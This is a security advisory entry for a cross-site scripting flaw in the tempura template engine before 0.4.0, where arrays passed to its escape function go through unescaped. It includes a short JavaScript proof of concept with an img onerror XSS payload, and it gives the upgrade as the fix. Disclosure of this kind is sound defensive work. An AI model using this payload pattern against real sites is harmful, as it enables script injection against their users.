Vulnerability	Vulnerable Version
M Cross-site Scripting (XSS) tempura is an A light, crispy, and delicious template engine. Affected versions of this package are vulnerable to Cross-site Scripting (XSS). If the input to the `esc` function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability. PoC const tempura = require("tempura"); let template = ` {{#expect name}} <p> Hello, {{name}} </p> ` let render = tempura.compile(template) let r1 = render({name: "<img src=x onerror='alert(1)' />"}) console.log(r1) // <p> Hello, &ltimg src=x onerror='alert(1)' /> </p> let r2 = render({name: ["<img src=x onerror='alert(1)' />"]}) console.log(r2) // <p> Hello, <img src=x onerror='alert(1)' /> </p> How to fix Cross-site Scripting (XSS)? Upgrade `tempura` to version 0.4.0 or higher.	<0.4.0

Cross-site Scripting (XSS)

tempura is an A light, crispy, and delicious template engine.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.

PoC

const tempura = require("tempura");

let template = `
    {{#expect name}}
    <p> Hello, {{name}} </p>
`

let render = tempura.compile(template)

let r1 = render({name: "<img src=x onerror='alert(1)' />"})
console.log(r1) // <p> Hello, &ltimg src=x onerror='alert(1)' /> </p>

let r2 = render({name: ["<img src=x onerror='alert(1)' />"]})
console.log(r2) // <p> Hello, <img src=x onerror='alert(1)' /> </p>

How to fix Cross-site Scripting (XSS)?

Upgrade tempura to version 0.4.0 or higher.

<0.4.0

Go back to all versions of this package